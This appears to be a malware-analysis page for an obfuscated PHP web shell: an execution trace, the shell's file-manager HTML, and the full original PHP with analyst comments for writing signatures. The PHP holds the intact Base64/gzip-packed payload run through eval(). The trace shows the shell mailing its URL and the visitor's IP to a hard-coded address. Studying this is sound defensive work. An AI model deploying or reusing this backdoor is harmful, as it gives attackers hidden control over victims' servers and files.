4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	178	$info .= 'x'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	179	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	180	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	181	$info .= 'x'
4	29	1	0.003069	472880
4	29	R			'drwxrwxrwx'
4	31	0	0.003083	472840	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	125	1	'/var/www/html/uploads/data'
4	31	1	0.003100	472880
4	31	R			TRUE
4	32	0	0.003114	472840	filemtime	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	127	1	'/var/www/html/uploads/data'
4	32	1	0.003128	472880
4	32	R			1676258413
4	33	0	0.003141	472784	date	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	127	2	'd-M-Y H:i'	1676258413
4	33	1	0.003201	475176
4	33	R			'12-Feb-2023 22:20'
4	34	0	0.003220	474912	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/prepend.php'
4	34	1	0.003239	474960
4	34	R			FALSE
4	35	0	0.003252	474920	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/userzero.phtml'
4	35	1	0.003267	474960
4	35	R			FALSE
4	36	0	0.003281	474904	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/.'
4	36	1	0.003297	474928
4	36	R			FALSE
4	37	0	0.003310	474896	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/..'
4	37	1	0.003326	474944
4	37	R			FALSE
4	38	0	0.003339	474904	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/.htaccess'
4	38	1	0.003355	474944
4	38	R			TRUE
4	39	0	0.003367	474904	filesize	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	1	'/var/www/html/uploads/.htaccess'
4	39	1	0.003381	474944
4	39	R			64
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	$size = 0.0625
4	40	0	0.003406	474848	round	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	2	0.0625	3
4	40	1	0.003426	474920
4	40	R			0.063
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	$size = 0.063
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	138	$size = '0.063 KB'
4	41	0	0.003465	474944	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	141	1	'/var/www/html/uploads/.htaccess'
4	41	1	0.003484	474984
4	41	R			FALSE
4	42	0	0.003496	474944	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	143	1	'/var/www/html/uploads/.htaccess'
4	42	1	0.003513	474984
4	42	R			TRUE
4	43	0	0.003526	474944	perms	1		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	145	1	'/var/www/html/uploads/.htaccess'
5	44	0	0.003540	474944	fileperms	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	1	'/var/www/html/uploads/.htaccess'
5	44	1	0.003554	474984
5	44	R			33188
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	$perms = 33188
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	161	$info = '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	173	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	174	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	175	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	176	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	177	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	178	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	179	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	180	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	181	$info .= '-'
4	43	1	0.003682	474984
4	43	R			'-rw-r--r--'
4	45	0	0.003696	474944	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/.htaccess'
4	45	1	0.003712	474984
4	45	R			FALSE
4	46	0	0.003725	474944	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/.htaccess'
4	46	1	0.003742	474984
4	46	R			TRUE
4	47	0	0.003755	474944	filemtime	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	1	'/var/www/html/uploads/.htaccess'
4	47	1	0.003769	474984
4	47	R			1676258413
4	48	0	0.003783	474888	date	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	2	'd-M-Y H:i'	1676258413
4	48	1	0.003815	475216
4	48	R			'12-Feb-2023 22:20'
4	49	0	0.003831	474944	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/data'
4	49	1	0.003847	474984
4	49	R			FALSE
4	50	0	0.003860	474952	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/prepend.php'
4	50	1	0.003876	475000
4	50	R			TRUE
4	51	0	0.003889	474960	filesize	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	1	'/var/www/html/uploads/prepend.php'
4	51	1	0.003903	475000
4	51	R			57
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	$size = 0.0556640625
4	52	0	0.003928	474856	round	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	2	0.0556640625	3
4	52	1	0.003942	474928
4	52	R			0.056
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	$size = 0.056
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	138	$size = '0.056 KB'
4	53	0	0.004041	474960	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	141	1	'/var/www/html/uploads/prepend.php'
4	53	1	0.004060	475000
4	53	R			FALSE
4	54	0	0.004073	474960	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	143	1	'/var/www/html/uploads/prepend.php'
4	54	1	0.004090	475000
4	54	R			TRUE
4	55	0	0.004102	474960	perms	1		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	145	1	'/var/www/html/uploads/prepend.php'
5	56	0	0.004116	474960	fileperms	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	1	'/var/www/html/uploads/prepend.php'
5	56	1	0.004131	475000
5	56	R			33261
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	$perms = 33261
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	161	$info = '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	173	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	174	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	175	$info .= 'x'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	176	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	177	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	178	$info .= 'x'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	179	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	180	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	181	$info .= 'x'
4	55	1	0.004265	475000
4	55	R			'-rwxr-xr-x'
4	57	0	0.004280	474960	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/prepend.php'
4	57	1	0.004297	475000
4	57	R			FALSE
4	58	0	0.004310	474960	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/prepend.php'
4	58	1	0.004327	475000
4	58	R			TRUE
4	59	0	0.004340	474960	filemtime	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	1	'/var/www/html/uploads/prepend.php'
4	59	1	0.004354	475000
4	59	R			1676258413
4	60	0	0.004367	474896	date	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	2	'd-M-Y H:i'	1676258413
4	60	1	0.004401	475224
4	60	R			'12-Feb-2023 22:20'
4	61	0	0.004416	474960	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/userzero.phtml'
4	61	1	0.004434	475000
4	61	R			TRUE
4	62	0	0.004446	474960	filesize	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	1	'/var/www/html/uploads/userzero.phtml'
4	62	1	0.004461	475000
4	62	R			4451
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	$size = 4.3466796875
4	63	0	0.004486	474856	round	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	2	4.3466796875	3
4	63	1	0.004501	474928
4	63	R			4.347
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	$size = 4.347
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	138	$size = '4.347 KB'
4	64	0	0.004539	474960	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	141	1	'/var/www/html/uploads/userzero.phtml'
4	64	1	0.004555	475000
4	64	R			FALSE
4	65	0	0.004570	474960	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	143	1	'/var/www/html/uploads/userzero.phtml'
4	65	1	0.004586	475000
4	65	R			TRUE
4	66	0	0.004599	474960	perms	1		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	145	1	'/var/www/html/uploads/userzero.phtml'
5	67	0	0.004613	474960	fileperms	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	1	'/var/www/html/uploads/userzero.phtml'
5	67	1	0.004627	475000
5	67	R			33204
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	$perms = 33204
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	161	$info = '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	173	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	174	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	175	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	176	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	177	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	178	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	179	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	180	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	181	$info .= '-'
4	66	1	0.004755	475000
4	66	R			'-rw-rw-r--'
4	68	0	0.004769	474960	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/userzero.phtml'
4	68	1	0.004790	475000
4	68	R			FALSE
4	69	0	0.004804	474960	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/userzero.phtml'
4	69	1	0.004820	475000
4	69	R			TRUE
4	70	0	0.004833	474960	filemtime	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	1	'/var/www/html/uploads/userzero.phtml'
4	70	1	0.004847	475000
4	70	R			1676258413
4	71	0	0.004859	474896	date	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	2	'd-M-Y H:i'	1676258413
4	71	1	0.004892	475224
4	71	R			'12-Feb-2023 22:20'
4	72	0	0.004920	475008	ini_set	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	188	2	'output_buffering'	0
4	72	1	0.004937	475080
4	72	R			FALSE
4	73	0	0.004950	475008	ini_set	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	189	2	'display_errors'	0
4	73	1	0.004966	475080
4	73	R			''
4	74	0	0.004980	475008	set_time_limit	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	190	1	0
4	74	1	0.004996	475040
4	74	R			FALSE
4	75	0	0.005009	475008	ini_set	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	191	2	'memory_limit'	'64M'
4	75	1	0.005027	475112
4	75	R			'128M'
4	76	0	0.005040	475008	header	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	192	1	'Content-Type: text/html; charset=UTF-8'
4	76	1	0.005059	475040
4	76	R			NULL
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	193	$to = 'alfredofernandezbutar@gmail.com'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	194	$f31337 = 'http://localhost/uploads/userzero.phtml'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	195	$fie = 'Akses http://localhost/uploads/userzero.phtml :p *IP Address : [ 127.0.0.1 ]'
4	77	0	0.005120	475224	mail	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	196	4	'alfredofernandezbutar@gmail.com'	'Papa Yui Chan Dapet Shell Nih : )'	'Akses http://localhost/uploads/userzero.phtml :p *IP Address : [ 127.0.0.1 ]'	'[ 127.0.0.1 ]'
4	77	1	0.006375	475368
4	77	R			FALSE
3	15	1	0.006418	475184
2	7	1	0.006436	429040
			0.006492	344944
TRACE END   [2023-02-13 01:20:39.730303]


Generated HTML code

<html><head>
<meta name="robots" content"noindex.="" nofollow"="">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">
<title>Black Eagle Team Minishell</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">
</head>
<body><div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>Black Eagle Team Minishell</center></h1></div><table width="100%" border="0" align="center" style="margin-top:-10px;"><tbody><tr><td><font style="font-size:13px;">Path: <a style="font-size:13px;" href="?path="></a>/<a style="font-size:13px;" href="?path=/var">var</a>/<a style="font-size:13px;" href="?path=/var/www">www</a>/<a style="font-size:13px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"><input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"></td></tr><tr><td></td></tr></tbody></table><div class="table-div"></div><input id="image" type="hidden"><br><center></center><div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 22:20</center></td><td><center><form method="POST" action="?option&amp;path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" 
value="/var/www/html/beneri.se_malware_analysis">&nbsp;<input type="submit" value=">>"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/userzero.phtml&amp;path=/var/www/html">userzero.phtml</a></td><td><center>4.347 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 22:20</center></td><td><center><form method="POST" action="?option&amp;path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="userzero.phtml"><input type="hidden" name="path" value="/var/www/html/userzero.phtml">&nbsp;<input type="submit" value=">>"></form></center></td></tr></tbody></table></div><br><center>© <span id="footer"></span> 2020 Black Eagle Team</center><br></body></html>

Original PHP code

<?php
/*
 * Analyst note: the banner that follows is the sample author's own text. It is kept
 * verbatim because handle and team strings like these are useful for signatures and
 * clustering. Its last two lines are Indonesian, roughly: "What are you doing, trying
 * to recode this? Nope, you can't."
 */
/*
            By: MR.P4UL / Bo0G3yM4n
            IG: @blackeagleteam.id
            Mau Ngapain Cukk Mau Recode Yah!
            Eitss Tidak Bisa
*/
/*
 * Analyst note: $p3mu14 is the stage-1 loader, stored as Base64 text. Decoded, it is a
 * single eval() statement that takes $arif and applies, innermost first:
 *   strrev -> base64_decode -> gzinflate x3 -> gzuncompress x2
 * then prepends a closing PHP tag and evaluates the result. The reversed Base64 is why
 * the $arif blob begins with "=" (the padding character ends up at the front).
 */
$p3mu14 = "ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs";
$arif = "=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";
/*
 * Analyst note: entry point of the sample. base64_decode($p3mu14) yields the stage-1
 * loader source, which is evaluated here; that loader in turn evaluates the unpacked
 * $arif blob, which is why the trace on this page reports frames as
 * "eval()'d code(1) : eval()'d code". The htmlspecialchars_decode/urldecode wrappers
 * appear to leave this particular string unchanged (it seems to contain no entities,
 * "%" escapes or "+") -- presumably they are only there to add noise; confirm when
 * writing a signature.
 *
 * Per the deobfuscated code and trace on this page, the final stage is a web file
 * manager (upload, rename, edit, delete driven by request-supplied paths) that also
 * calls mail() to report the script's URL and the visitor's IP to a hard-coded address;
 * in the sandbox run that mail() call returned FALSE.
 *
 * Triage indicators visible in this file: eval() over base64_decode(), a large string
 * literal beginning with "=", stacked gzinflate/gzuncompress calls in the decoded
 * loader, and a .phtml file located under an uploads directory (per the trace path).
 * NOTE(review): eval() of embedded, encoded data -- treat the host as compromised and
 * analyse only in an isolated environment.
 */
eval(htmlspecialchars_decode(urldecode(base64_decode($p3mu14))));
// Terminates the request once the payload has run, so nothing after this line executes.
exit;
?>